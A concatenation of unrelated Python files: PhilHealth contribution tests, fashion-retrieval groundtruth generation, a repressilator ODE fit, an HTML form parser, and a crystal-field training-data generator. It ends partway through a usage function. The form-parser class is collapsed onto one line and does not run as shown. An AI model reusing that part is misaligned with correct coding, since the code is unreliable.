        self.assertEqual(
            PhilHealthContribution(43000).monthly_contribution, 1100
        )

    def test_contribution_value_self_employed(self):
        self.assertEqual(
            PhilHealthContribution(20000, 'self-employed').monthly_contribution, 200
        )
        self.assertEqual(
            PhilHealthContribution(26000, 'self-employed').monthly_contribution, 300
        )


if __name__ == '__main__':
    unittest.main()
from datasets import fashion200k
from datasets import fashion_iq
from datasets import shoes
from config import *
from model import *

import tensorflow as tf
import numpy as np

# python generate_groundtruth.py --dataset='fashion200k'
# python generate_groundtruth.py --dataset='shoes' --data_path=''
# python generate_groundtruth.py --dataset='fashion_iq' --data_path='fashion_iq'
# python generate_groundtruth.py --dataset='fashion_iq' --data_path='fashion_iq' --subset=dress
# python generate_groundtruth.py --dataset='fashion_iq' --data_path='fashion_iq' --subset=shirt
# python generate_groundtruth.py --dataset='fashion_iq' --data_path='fashion_iq' --subset=toptee

tf.app.flags.DEFINE_string('data_path', "datasets/fashion200k", 'path of dataset.')
tf.app.flags.DEFINE_string('data_split', "test", '')
tf.app.flags.DEFINE_string('dataset', "fashion200k", '')
tf.app.flags.DEFINE_string('subset', None, 'can be "dress" or "shirt" or "toptee".')


def main():
    ### prepare test set
    if FLAGS.dataset == "fashion200k":
        testset = fashion200k.fashion200k(path=FLAGS.data_path, split=FLAGS.data_split)
        filename = "groundtruth/fashion200k_modif_pairs.npy"
    elif FLAGS.dataset == "fashion_iq":
        testset = fashion_iq.fashion_iq(path=FLAGS.data_path, split=FLAGS.data_split, subset=FLAGS.subset)
        if FLAGS.subset is None:
            filename = "groundtruth/fashion_iq_modif_pairs.npy"
        else:
            filename = "groundtruth/fashion_iq_modif_pairs_" + FLAGS.subset + ".npy"
    elif FLAGS.dataset == "shoes":
        testset = shoes.shoes(path=FLAGS.data_path, split=FLAGS.data_split)
        filename = "groundtruth/shoes_modif_pairs.npy"
    else:
        raise ValueError("dataset is unknown.")

    ### generate source-query pairs at test time
    if FLAGS.dataset == "fashion200k":
        testset.generate_test_queries_()
        num_query = len(testset.test_queries)
        num_images = len(testset.filenames)
        groundtruth = np.full((num_query, num_images), False, dtype=bool)
        ### find the matching text pairs in the testset
        for i in range(num_query):
            ### the groundtruth has the same target text :)
            indices = [index for (index, letter) in enumerate(testset.texts)
                       if letter == testset.test_queries[i]['target_caption']]
            groundtruth[i, indices] = True  # 1
        np.save(filename, groundtruth)

    elif FLAGS.dataset == 'shoes':
        testset.generate_queries_()
        testset.generate_test_images_all_()
        database = testset.database
        num_images = len(database)
        num_query = len(testset.source_files)
        groundtruth = np.full((num_query, num_images), False, dtype=bool)
        for i in range(num_query):
            idx = database.index(testset.target_files[i])
            groundtruth[i, idx] = True
        print('num_images = %d; num_query = %d' % (num_images, num_query))
        np.save(filename, groundtruth)

    elif FLAGS.dataset == 'fashion_iq':
        testset.generate_queries_(subset=FLAGS.subset)
        testset.generate_test_images_all_(subset=FLAGS.subset)
        database = testset.database
        num_images = len(database)
        num_query = len(testset.source_files)
        groundtruth = np.full((num_query, num_images), False, dtype=bool)
        for i in range(num_query):
            idx = database.index(testset.target_files[i])
            groundtruth[i, idx] = True
        print('num_images = %d; num_query = %d' % (num_images, num_query))
        np.save(filename, groundtruth)


if __name__ == '__main__':
    main()
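
# Added sketch (not part of the original script): one way the saved boolean groundtruth
# matrix can be consumed downstream. `scores` is a hypothetical (num_query, num_images)
# similarity matrix produced by some retrieval model, not by this file.
def recall_at_k(scores, groundtruth, k=10):
    topk = np.argsort(-scores, axis=1)[:, :k]                        # top-k image indices per query
    hits = np.take_along_axis(groundtruth, topk, axis=1).any(axis=1)  # query counts as hit if any top-k is correct
    return hits.mean()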
#!/usr/bin/env python

import numpy as np
from scipy.integrate import odeint

repressilator_bounds = [(0.0001, 3), (0, 3), (0.0001, 300), (1, 3)]


def repressilator(k):
    time = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0,
            16.0, 17.0, 18.0, 19.0, 20.0, 21.0, 22.0, 23.0, 24.0, 25.0, 26.0, 27.0, 28.0, 29.0, 30.0]

    data = [
        [0.0, 4.488846434366473, 2.714549849482517, 6.444232842805658, 24.46915418051586, 28.10847096509343, 12.352648374738962, 4.642084698577026, 1.7680776143463963, 1.021496030595813, 3.267806870812699, 20.929580826244084, 78.3339386191075, 100.7436161294691, 47.79012929059134, 17.941099072860265, 6.617110586145705, 2.4440268086718504, 0.951563472874828, 0.7644717392379156, 3.5650512822218166, 23.478296974713917, 87.23136259723577, 128.32521206660542, 69.30940166807454, 26.37789572418784, 9.734102510989835, 3.5877278085642805, 1.341496339018698, 0.6566841899282982, 1.5514740612906064],
        [0.0, 7.742061201862163, 14.391088537157326, 16.974296844695527, 7.899954410672454, 3.069399974996809, 1.4354765740337925, 2.6773119148949496, 15.941754369100247, 63.10289659169389, 75.72477982893746, 34.0520319646856, 12.7289107612553, 4.696629202852429, 1.7465995092492885, 0.7699829065751013, 1.3012974418730994, 8.258355474482642, 45.87172051258875, 115.03319324718298, 103.88397198459698, 43.774965755726306, 16.26789221889942, 5.995229700373173, 2.2150455948615915, 0.872025466380766, 0.7757453858288323, 3.883609594481504, 25.34784699509665, 90.8747629049713, 129.33441542341896],
        [0.0, 15.377957596058963, 7.271258542143068, 3.130204124770662, 1.9680627901714662, 5.88349037388796, 29.67982713087371, 54.460354064814375, 28.46895977886859, 10.807796228922934, 3.9986584694811, 1.507968306741181, 0.8159479616352445, 2.373231728111996, 15.757634891245326, 69.26229678427654, 120.1993554217916, 71.53867088006662, 27.56348971165622, 10.18036554609494, 3.7524367255334536, 1.4013420739082287, 0.6712101030917313, 1.496285727399844, 9.97675873270304, 52.53481181917566, 121.78229638959401, 103.36679024093779, 42.84595626728656, 15.902563870945832, 5.860016651007407],
        [5.0, 3.7838452971716685, 2.7474664897608516, 8.301575599628254, 28.947584598674258, 25.013238712836074, 9.9924721357968, 3.726366255890754, 1.446840734155867, 1.054385536657148, 4.457314954597095, 28.137201041233915, 91.43846811458191, 93.2188752686717, 38.7803561106884, 14.370017414630524, 5.296162462028342, 1.9600077860482445, 0.7946386996400134, 0.8795461071715619, 4.944394318921207, 31.499164170332946, 102.28991056938025, 124.50395812364114, 56.795321112621046, 21.13964698165305, 7.790239451169012, 2.8726041530697364, 1.0865219442970149, 0.6307944930344132, 2.0848918689606855],
        [0.0, 7.862347076990986, 16.621041722916388, 15.393063602753598, 6.443103590060988, 2.495836230065179, 1.330784634849836, 3.507181780947691, 21.549868725965723, 73.98225839463343, 68.39234852399709, 27.540315326699634, 10.1942538423991, 3.76029412985095, 1.4080468655473872, 0.6979691371526444, 1.6975358084630652, 11.440580249938984, 58.55466038674178, 125.37615593859023, 90.63257642471467, 35.26543063698353, 13.0232526301014, 4.798156416258913, 1.777066339706983, 0.7341923658523394, 0.9148179382167453, 5.395779231869185, 33.87282378972335, 105.89835094407697, 124.64292696753931],
        [15.0, 13.19508896774686, 6.089957927605723, 2.623252877978745, 2.043504673077439, 7.871507322911047, 37.40757267760475, 52.64984146642906, 23.2622883707938, 8.664377770258772, 3.204126405040172, 1.2281613471574242, 0.8209470359420186, 3.2274735892153115, 21.484132877498908, 83.8154464725227, 120.34043619689287, 59.11277660705078, 22.10306981303201, 8.147819943670633, 3.0043938453519865, 1.133834734169324, 0.6375264866255466, 2.001979323134851, 13.786923392575122, 66.1986210559441, 131.06571578133176, 89.35344838736052, 34.48545842054846, 12.729978045976193, 4.689921055534799],
    ]

    def repressilator_model(y, t):
        dy0 = 5 * y[3] - 5 * y[0]
        dy1 = 5 * y[4] - 5 * y[1]
        dy2 = 5 * y[5] - 5 * y[2]
        dy3 = k[1] + k[2] / (1 + y[2] ** k[3]) - k[0] * y[3]
        dy4 = k[1] + k[2] / (1 + y[0] ** k[3]) - k[0] * y[4]
        dy5 = k[1] + k[2] / (1 + y[1] ** k[3]) - k[0] * y[5]
        return [dy0, dy1, dy2, dy3, dy4, dy5]

    init = np.array([0.0, 0.0, 0.0, 5.0, 0.0, 15.0])
    simulation = odeint(repressilator_model, init, time)

    return sum([sum((simulation[:, i] - data[i]) ** 2) for i in range(len(data))])
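
# Added sketch (not part of the original file): repressilator(k) is a sum-of-squares
# misfit against the bundled trajectories, so it can be minimised over
# repressilator_bounds, for example with SciPy's differential evolution. The solver
# choice and its settings here are illustrative assumptions, not the original driver.
if __name__ == '__main__':
    from scipy.optimize import differential_evolution

    result = differential_evolution(repressilator, repressilator_bounds,
                                    maxiter=50, tol=1e-6, seed=0)
    print('best parameters:', result.x)
    print('residual sum of squares:', result.fun)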
"""Extract form handler""" import logging class FilesUploadForm: def __init__(self, form_root): """Takes in the root form node returned by lxml.etree.fromstring()""" self.root = form_root self.named_fields = [tag for tag in self.root.xpath('.//*[@name]')] self.prefilled_fields = [(field.attrib['name'], field.attrib.get('value')) for field in self.named_fields] self.log = logging.getLogger(__name__) log_fmt = f'%(levelname)s: %(asctime)s {self.__class__.__name__}.%(funcName)s: %(message)s' stream_hdlr = logging.StreamHandler() stream_hdlr.setFormatter(logging.Formatter(fmt=log_fmt)) self.log.addHandler(stream_hdlr) def get_parsed_form_fields(self): all_parsed_options = dict() all_parsed_options.update(self.find_text_inputs()) all_parsed_options.update(self.find_selects()) return all_parsed_options def find_text_inputs(self): text_inputs = [tag for tag in self.named_fields if tag.tag == 'input' and tag.attrib.get('type') == 'text'] text_options = [(tag.attrib['name'], {'Required': False, 'ValidValues': str}) for tag in text_inputs] return dict(text_options) def find_selects(self): selects = [tag for tag in self.named_fields if tag.tag == 'select'] return self._scrape_options_to_dict(selects, False) def _scrape_options_to_dict(self, selects, allow_multiple=True): options_dict = dict() for tag in selects: options = [(option.text, option.attrib.get('value')) for option in tag.xpath('.//option')] options_dict[tag.attrib['name']] = {'Required': True, 'ValidValues': dict([('_allows_multiple', allow_multiple)] + options)} return options_dict
from ast import parse
import numpy as np
import pandas as pd
from scipy import linalg as LA
from numpy.random import default_rng
import ham_cr
import os
import argparse


class training_data:
    """
    Generates and outputs training data: specific_heat(T), susceptibility(T) and
    magnetization(T, B) along specified direction(s).

    (Optional) parameters that can be provided at instantiation:
        point_group:  point group defining the form of the crystal field Hamiltonian (set to 'Oh' per default)
        N_t:          number of training sets = number of randomly chosen Stevens parameter sets (set to 1 per default)
        rng_seed:     seed of the random number generator that draws Stevens parameters (set to 1 per default)
        J, L, S:      angular momentum of the ion (set to J=4, L=5, S=1 per default)
        B_directions: magnetic field directions considered in susc and mag (set to [[0,0,1]] per default)
    """

    # Bohr magneton over Boltzmann constant.
    # Used to transform the magnetic field B from units of Tesla to units of Kelvin:
    # [muB*B/k_B] = Kelvin with [B] = Tesla
    muB_over_kB = 0.671713816

    def __init__(self, point_group='Oh', N_t=1, rng_seed=1, J=4, L=5, S=1, B_directions=[[0, 0, 1]]):
        self.point_group = point_group
        self.N_t = N_t
        self.rng_seed = rng_seed
        self.rg = default_rng(rng_seed)
        self.J = J
        self.L = L
        self.S = S
        self.B_directions = B_directions

    ###### define angular momentum operators Jx_op, Jy_op, Jz_op for a given J value #####
    def Jz_op(self):
        mat = np.diag(np.arange(2*self.J+1, dtype=float) - self.J)
        return mat

    def Jplus_op(self):
        mat = np.diag(np.sqrt((2*self.J - np.arange(2*self.J))*(np.arange(2*self.J)+1)), -1)
        return mat

    def Jminus_op(self):
        mat = np.diag(np.sqrt((2*self.J - np.arange(2*self.J))*(np.arange(2*self.J)+1)), 1)
        return mat

    def Jx_op(self):
        mat = (self.Jplus_op() + self.Jminus_op())/2.
        return mat

    def Jy_op(self):
        mat = -1j/2.*(self.Jplus_op() - self.Jminus_op())
        return mat

    def gJLS(self):
        return 1 + (self.J*(self.J + 1) + self.S*(self.S+1) - self.L*(self.L+1))/(2*self.J*(self.J + 1))

    ####### Draw random Stevens parameters #######################################
    def generate_random_stevens(self, W_sign):
        """
        Generates random values for the Stevens parameters of the given point group.

        Parameters:
            W_sign: sign of the overall energy scale x0

        Returns:
            stevens_params: array with random instances of Stevens parameters
        """
        # TO DO: implement error messages if the range is not correct; in particular, the loop
        # will get stuck if the range of x_1, ..., x_{N-1} is not given by [-1, 1].
        if self.point_group == 'Oh':
            # two Stevens parameters for m-3m = Oh point group
            range = [[0.5, 50], [-1, 1]]
            x0 = (range[0][0] + (range[0][1] - range[0][0])*self.rg.random())*W_sign
            x1 = range[1][0] + (range[1][1] - range[1][0])*self.rg.random()
            stevens_params = np.array([x0, x1])
        elif self.point_group == "C4v":
            # 5 Stevens parameters for 4mm = C4v point group
            range = [[0.5, 50], [-1, 1], [-1, 1], [-1, 1], [-1, 1]]
            stevens_params = np.array([1., 1., 1., 1., 1., 0.])
            while (np.sum(np.abs(stevens_params)) - np.abs(stevens_params[0]) - np.abs(stevens_params[-1]) > 1):
                stevens_params[0] = (range[0][0] + (range[0][1] - range[0][0])*self.rg.random())*W_sign
                stevens_params[1] = range[1][0] + (range[1][1] - range[1][0])*self.rg.random()
                stevens_params[2] = range[2][0] + (range[2][1] - range[2][0])*self.rg.random()
                stevens_params[3] = range[3][0] + (range[3][1] - range[3][0])*self.rg.random()
                stevens_params[4] = range[4][0] + (range[4][1] - range[4][0])*self.rg.random()
            stevens_params[5] = 2.*self.rg.random() - 1.
            # only the sign of x5 matters, as its size is determined by x1, ..., x4.
        elif self.point_group == "D3h":
            # 4 Stevens parameters for -6m2 = D3h point group
            range = [[0.5, 50], [-1, 1], [-1, 1], [-1, 1]]
            stevens_params = np.array([1., 1., 1., 1., 0.])
            while (np.sum(np.abs(stevens_params)) - np.abs(stevens_params[0]) - np.abs(stevens_params[-1]) > 1):
                stevens_params[0] = (range[0][0] + (range[0][1] - range[0][0])*self.rg.random())*W_sign
                stevens_params[1] = range[1][0] + (range[1][1] - range[1][0])*self.rg.random()
                stevens_params[2] = range[2][0] + (range[2][1] - range[2][0])*self.rg.random()
                stevens_params[3] = range[3][0] + (range[3][1] - range[3][0])*self.rg.random()
            stevens_params[4] = 2.*self.rg.random() - 1.
            # only the sign of x4 matters, as its size is determined by x1, ..., x3.
        else:
            raise ValueError("This point group is not implemented.")
        return stevens_params

    ####### Define the crystal field Hamiltonian for given point group and J ##########
    def ham_cr(self, stevens_params):
        """
        Outputs the crystal field Hamiltonian H in units of Kelvin. The units of H are set by the
        units of x0; we choose the range of x0 (=[0.5, 50] Kelvin), which corresponds to [x0] = Kelvin.

        Parameters:
            stevens_params: array of Stevens parameters (length is checked per point group).
                x0 has dimensions of energy (we use Kelvin) and x1, x2, ... are dimensionless in the interval [-1, 1].

        Returns:
            ham_cr: crystal field Hamiltonian array
        """
        if (self.point_group == 'Oh'):
            if (len(stevens_params) != 2):
                raise ValueError("Number of Stevens parameters should be 2 for point group Oh")
            if (self.J == 4):
                return ham_cr.ham_cr_PG_Oh_J_4(stevens_params[0], stevens_params[1])
            elif (self.J == 7.5):
                return ham_cr.ham_cr_PG_Oh_J_7_5(stevens_params[0], stevens_params[1])
            elif (self.J == 3.5):
                return ham_cr.ham_cr_PG_Oh_J_3_5(stevens_params[0], stevens_params[1])
            elif (self.J == 6):
                return ham_cr.ham_cr_PG_Oh_J_6(stevens_params[0], stevens_params[1])
            elif (self.J == 8):
                return ham_cr.ham_cr_PG_Oh_J_8(stevens_params[0], stevens_params[1])
            elif (self.J == 4.5):
                return ham_cr.ham_cr_PG_Oh_J_4_5(stevens_params[0], stevens_params[1])
        elif (self.point_group == 'C4v'):
            if (len(stevens_params) != 6):
                raise ValueError("Number of Stevens parameters should be 5+1=6 for point group C4v")
            if (self.J == 4):
                return ham_cr.ham_cr_PG_C4v_J_4(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5])
            elif (self.J == 7.5):
                return ham_cr.ham_cr_PG_C4v_J_7_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5])
            elif (self.J == 3.5):
                return ham_cr.ham_cr_PG_C4v_J_3_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5])
            elif (self.J == 6):
                return ham_cr.ham_cr_PG_C4v_J_6(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5])
            elif (self.J == 8):
                return ham_cr.ham_cr_PG_C4v_J_8(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5])
            elif (self.J == 4.5):
                return ham_cr.ham_cr_PG_C4v_J_4_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4], stevens_params[5])
        elif (self.point_group == 'D3h'):
            if (len(stevens_params) != 5):
                raise ValueError("Number of Stevens parameters should be 4+1=5 for point group D3h")
            if (self.J == 4):
                return ham_cr.ham_cr_PG_D3h_J_4(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4])
            elif (self.J == 7.5):
                return ham_cr.ham_cr_PG_D3h_J_7_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4])
            elif (self.J == 3.5):
                return ham_cr.ham_cr_PG_D3h_J_3_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4])
            elif (self.J == 6):
                return ham_cr.ham_cr_PG_D3h_J_6(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4])
            elif (self.J == 8):
                return ham_cr.ham_cr_PG_D3h_J_8(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4])
            elif (self.J == 4.5):
                return ham_cr.ham_cr_PG_D3h_J_4_5(stevens_params[0], stevens_params[1], stevens_params[2], stevens_params[3], stevens_params[4])
        else:
            raise ValueError("This point group and/or value of J is not implemented.")

    ####### Calculate specific heat ##################################
    def specific_heat(self, ham, T_min=2, T_max=300, T_steps=150):
        """
        Returns an array of cV/kB for a single rare-earth ion over the temperature range [T_min, T_max]
        for Hamiltonian matrix ham. Note that cV/kB is dimensionless; to get the specific heat,
        multiply the result by the Boltzmann constant kB.

        Parameters:
            ham:     hermitian Hamiltonian matrix, typically the crystal field Hamiltonian (dimension 2*J+1)
            T_min:   minimal temperature in Kelvin
            T_max:   maximal temperature in Kelvin
            T_steps: total number of steps in the temperature range

        Returns:
            cV_array: cV/kB for a single rare-earth ion. Array of dimension (T_steps, 2) containing
                (T_i, cV/kB(T_i)), where T_i is the temperature at step i.
        """
        T = np.linspace(T_min, T_max, T_steps)  # linearly spaced temperatures
        energies = LA.eigvalsh(ham)
        energies = energies - energies[0]

        # partition function for zero field
        def Z_cr(T):
            return np.sum(np.exp(-energies/T))

        # specific heat expression
        def cV(T):
            return 1./(T**2) * (np.sum(energies**2 * np.exp(-energies/T))/Z_cr(T)
                                - np.sum(energies * np.exp(-energies/T)/Z_cr(T))**2)

        cV_array = np.zeros((len(T), 2))
        # this can probably be optimized using numpy ufuncs, but it is ok for now
        for i in range(0, len(cV_array)):
            cV_array[i][0] = T[i]
            cV_array[i][1] = cV(T[i])
        return cV_array

    ######### Calculate magnetization ##############################
    def magnetization(self, ham_cr, B_direction, B_min=0, B_max=10, B_steps=20, T_min=2, T_max=300, T_steps=4):
        """
        Returns an array of the moment per R-ion mu/mu_B over the temperature and magnetic field ranges
        [T_min, T_max] and [B_min, B_max] for a system with zero-field Hamiltonian matrix ham_cr.
        Note that mu/mu_B is dimensionless. The magnetic field is along B_direction (x, y, z).

        Parameters:
            ham_cr:      hermitian Hamiltonian matrix in zero field, typically the crystal field Hamiltonian (dimension 2*J+1)
            B_direction: (B_x, B_y, B_z) triple denoting the field direction in real space
            B_min:       minimal field (in Tesla)
            B_max:       maximal field (in Tesla)
            B_steps:     total number of steps in the field range
            T_min:       minimal temperature in Kelvin
            T_max:       maximal temperature in Kelvin
            T_steps:     total number of steps in the temperature range

        Returns:
            mag_array: induced moment on the R-ion, mu/muB, in an array of dimension (B_steps, T_steps, 3)
                containing (B_i, T_i, mag(B_i, T_i)), where T_i (B_i) is the temperature (field) at step i.
                Note that this differs by a factor of gJLS from a previous version of the function.
        """
        gJLS = float(self.gJLS())
        T_array = np.geomspace(T_min, T_max, T_steps)
        B_array = np.linspace(B_min, B_max, B_steps)
        B_direction = B_direction/LA.norm(B_direction)
        J_op = B_direction[0]*self.Jx_op() + B_direction[1]*self.Jy_op() + B_direction[2]*self.Jz_op()
        mag_array = np.zeros((len(B_array), len(T_array), 3))

        # this can probably be optimized using numpy ufuncs, but it is ok for now
        for B_idx in np.arange(0, len(B_array)):
            B = B_array[B_idx]
            ham = ham_cr - gJLS*self.muB_over_kB*J_op*B
            energies, eigenstates = LA.eigh(ham)
            energies = energies - energies[0]
            for T_idx in range(0, len(T_array)):
                T = T_array[T_idx]
                ZB = np.sum(np.exp(-energies/T))
                # mag = \mu/\mu_B is the moment per R-ion over the Bohr magneton. mag is dimensionless.
                mag = gJLS/ZB*np.sum([np.dot(np.conjugate(eigenstates[:, i]), np.dot(J_op, eigenstates)[:, i])*np.exp(-energies[i]/T) for i in range(0, len(energies))])
                mag_array[B_idx][T_idx][0] = B_array[B_idx]
                mag_array[B_idx][T_idx][1] = T_array[T_idx]
                mag_array[B_idx][T_idx][2] = mag
        return mag_array

    ########### Calculate magnetic susceptibility ############################
    def susceptibility(self, ham_cr, B_direction, B=0.0001, T_min=1, T_max=300, T_steps=300):
        """
        Calculates and returns the magnetic susceptibility chi_a = mu/(mu_B*B) (units of 1/T) over the
        temperature range [T_min, T_max] for zero-field Hamiltonian matrix ham_cr. Here, mu is the
        induced moment on the R-ion, mu_B is the Bohr magneton and B the magnetic field.
        The direction is a = B_direction.

        Parameters:
            ham_cr:      hermitian Hamiltonian matrix in zero field, typically a crystal field Hamiltonian (dimension 2*J+1)
            B_direction: (B_x, B_y, B_z) triple denoting the field direction in real space
            B:           B field used in the susceptibility calculation (in Tesla). Should be << all other energy scales.
            T_min:       minimal temperature in Kelvin
            T_max:       maximal temperature in Kelvin
            T_steps:     total number of steps in the temperature range

        Returns:
            susc_array: array of dimension (T_steps, 2) containing (T_i, mu(T_i)/(muB*B)), where T_i is the
                temperature at step i and mu(T_i)/mu_B = mag(T_i) is the field-induced moment on the R-ion.
                Note that this differs by a factor of gJLS from a previous version of the function.
        """
        gJLS = float(self.gJLS())
        T_array = np.linspace(T_min, T_max, T_steps)
        B_direction = B_direction/LA.norm(B_direction)
        J_op = B_direction[0]*self.Jx_op() + B_direction[1]*self.Jy_op() + B_direction[2]*self.Jz_op()
        susc_array = np.zeros((len(T_array), 2))

        # this can probably be optimized using numpy ufuncs, but it is ok for now
        # B is given in units of T, ham is in units of K.
        ham = ham_cr - gJLS*self.muB_over_kB*J_op*B
        energies, eigenstates = LA.eigh(ham)
        energies = energies - energies[0]
        for T_idx in range(0, len(T_array)):
            T = T_array[T_idx]
            ZB = np.sum(np.exp(-energies/T))
            # mag = mu/mu_B, where \mu is the field-induced moment on the R-ion
            mag = gJLS/ZB*np.sum([np.dot(np.conjugate(eigenstates[:, i]), np.dot(J_op, eigenstates)[:, i])*np.exp(-energies[i]/T) for i in range(0, len(energies))])
            susc_array[T_idx][0] = T_array[T_idx]
            # susc = mag/B = \mu/(\mu_B B) has units of 1/T
            susc_array[T_idx][1] = mag/B
        return susc_array

    ######## Output training data into files #################
    def output_all_data(self, W_sign, cV_T_range=[1, 300, 100], susc_T_range=[1, 300, 100], mag_T_range=[1, 300, 4], mag_B_range=[0.5, 10, 20]):
        """
        Generates the training data for N_t randomly drawn Stevens parameter sets.

        Parameters:
            W_sign: sign of W for the Stevens parameters

        Optional parameters:
            cV_T_range:   [T_min, T_max, T_steps] array for the specific heat calculation
            susc_T_range: [T_min, T_max, T_steps] array for the susceptibility calculation
            mag_T_range:  [T_min, T_max, T_steps] array for the magnetization calculation
            mag_B_range:  [B_min, B_max, B_steps], where B_steps is the number of B points within [B_min, B_max]

        Returns:
            stevens_params_all: array with parameter values of Stevens parameters
            cV_data_all:        array with specific heat values
            susc_data_all:      array with susceptibility values
            mag_data_all:       array with magnetization values
        """
        stevens_params_all = []
        cV_data_all = []
        susc_data_all = []
        mag_data_all = []

        for N_t_idx in range(0, self.N_t):
            stevens_params = self.generate_random_stevens(W_sign)  # draw random Stevens parameters
            # use a list to store all Stevens parameters: different point groups have different
            # numbers of Stevens parameters, so the stored tuples have different lengths.
            stevens_params_all.append(stevens_params)

            ham_cr = self.ham_cr(stevens_params)  # crystal field Hamiltonian for the drawn Stevens parameters

            # generate specific heat data and store in cV_data
            cV_data_all.append(self.specific_heat(ham_cr, T_min=cV_T_range[0], T_max=cV_T_range[1], T_steps=cV_T_range[2]))

            B_direction_steps = len(self.B_directions)

            # generate susceptibility and magnetization data and store them (for all B_directions)
            susc_data = np.zeros((susc_T_range[2], 1 + B_direction_steps))
            mag_data = np.zeros((mag_B_range[2], mag_T_range[2], 2 + B_direction_steps))

            for B_direction_idx in range(0, B_direction_steps):
                B_direction = self.B_directions[B_direction_idx]
                susc_array = self.susceptibility(ham_cr, B_direction, B=0.0001,
                                                 T_min=susc_T_range[0], T_max=susc_T_range[1], T_steps=susc_T_range[2])
                mag_array = self.magnetization(ham_cr, B_direction,
                                               B_min=mag_B_range[0], B_max=mag_B_range[1], B_steps=mag_B_range[2],
                                               T_min=mag_T_range[0], T_max=mag_T_range[1], T_steps=mag_T_range[2])

                for T_idx in range(0, len(susc_array)):
                    if (B_direction_idx == 0):
                        susc_data[T_idx][0] = susc_array[T_idx][0]
                    susc_data[T_idx][1 + B_direction_idx] = susc_array[T_idx][1]

                for B_idx in range(0, mag_B_range[2]):
                    for T_idx in range(0, mag_T_range[2]):
                        if (B_direction_idx == 0):
                            mag_data[B_idx][T_idx][0] = mag_array[B_idx][T_idx][0]
                            mag_data[B_idx][T_idx][1] = mag_array[B_idx][T_idx][1]
                        mag_data[B_idx][T_idx][2 + B_direction_idx] = mag_array[B_idx][T_idx][2]

            susc_data_all.append(susc_data)
            mag_data_all.append(mag_data)

        return stevens_params_all, cV_data_all, susc_data_all, mag_data_all


if __name__ == '__main__':
    parser = argparse.ArgumentParser()

    # Command line arguments
    parser.add_argument("-pg", "--pg", type=str, default="Oh", help="Crystal field point group")
    parser.add_argument("-J", "--J", type=int, default=4, help="Total angular momentum")
    parser.add_argument("-L", "--L", type=int, default=5, help="Orbital angular momentum")
    parser.add_argument("-S", "--S", type=int, default=1, help="Spin angular momentum")
    parser.add_argument("-b", "--b_dirs", type=list, default=[[1, 0, 0], [0, 0, 1]], help="Magnetic field directions")
    parser.add_argument("-n", "--num_ex", type=int, default=1000, help="Number of training examples to generate")
    parser.add_argument("-o", "--output_dir", type=str, default=os.getcwd(), help="Output directory")
    parser.add_argument("-sd", "--seed", type=int, default=None, help="Seed for random number generator")
    parser.add_argument("-w", "--w_sign", type=int, default=1, help="Sign of x_0")
    parser.add_argument("-cV", "--cV_T_range", type=list, default=[1, 300, 64],
                        help="[T_min, T_max, T_steps] array for specific heat calculation")
    parser.add_argument("-su", "--susc_T_range", type=list, default=[1, 300, 64],
                        help="[T_min, T_max, T_steps] array for susceptibility calculation")
    parser.add_argument("-mT", "--mag_T_range", type=list, default=[1, 300, 3],
                        help="[T_min, T_max, T_steps] array for magnetization calculation")
    parser.add_argument("-mB", "--mag_B_range", type=list, default=[0, 10, 64],
                        help="[B_min, B_max, B_steps], where B_steps is the number of B points within range [B_min, B_max]")

    args = parser.parse_args()

    POINT_GROUP = args.pg
    B_DIRECTIONS = args.b_dirs
    W_SIGN = args.w_sign
    SEED = args.seed
    TRAINING_EXAMPLES = args.num_ex
    J = args.J  # 4  # 15/2
    L = args.L  # 5  # 6
    S = args.S  # 1  # 3/2
    OUTPUT_DIR = args.output_dir
    CV_T_RANGE = args.cV_T_range
    SUSC_T_RANGE = args.susc_T_range
    MAG_T_RANGE = args.mag_T_range
    MAG_B_RANGE = args.mag_B_range

    td = training_data(POINT_GROUP, TRAINING_EXAMPLES, SEED, J, L, S, B_DIRECTIONS)
    out = td.output_all_data(
        W_sign=W_SIGN,
        cV_T_range=CV_T_RANGE,
        susc_T_range=SUSC_T_RANGE,
        mag_T_range=MAG_T_RANGE,
        mag_B_range=MAG_B_RANGE
    )
    # out[0]  # Stevens parameters
    # out[1]  # specific heat   [[T_i, cV^(0)_i], [T_i, cV^(1)_i], ..., [T_i, cV^(N_t-1)_i]], i = 1, ..., T_steps
    # out[2]  # susceptibility  [[T_i, susc^(0)_{0,i}, susc^(0)_{1,i}, ..., susc^(0)_{B_direction-1,i}], ...], i = 1, ..., T_steps
    # out[3]  # magnetization   [[[B_j, T_i, M^(0)_{0,i,j}, M^(0)_{1,i,j}, ..., M^(0)_{B_direction-1,i,j}], ...]], j = 1, ..., B_steps; i = 1, ..., T_steps

    targets_df = pd.DataFrame(out[0])

    data_arr = np.array(out[1])[:, :, 1]
    for i in range(len(B_DIRECTIONS)):          # size of B_directions
        data_arr = np.concatenate([data_arr, np.array(out[2])[:, :, i+1]], axis=1)
    for i in range(MAG_T_RANGE[2]):             # T step for magnetization
        for j in range(len(B_DIRECTIONS)):      # size of B_directions
            data_arr = np.concatenate([data_arr, np.array(out[3])[:, :, i, j+2]], axis=1)
    data_df = pd.DataFrame(data_arr)

    targets_df.to_csv(os.path.join(OUTPUT_DIR, "generated_targets.csv"), header=None, index=None)
    data_df.to_csv(os.path.join(OUTPUT_DIR, "generated_data.csv"), header=None, index=None)
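
# Added usage sketch (not part of the original file): generate a tiny batch of curves
# in memory instead of going through the command-line driver above. The parameter
# values are arbitrary examples and assume that the ham_cr module with its
# ham_cr_PG_Oh_J_4 table is importable.
def _example_training_batch():
    td_example = training_data(point_group='Oh', N_t=2, rng_seed=7,
                               J=4, L=5, S=1, B_directions=[[0, 0, 1]])
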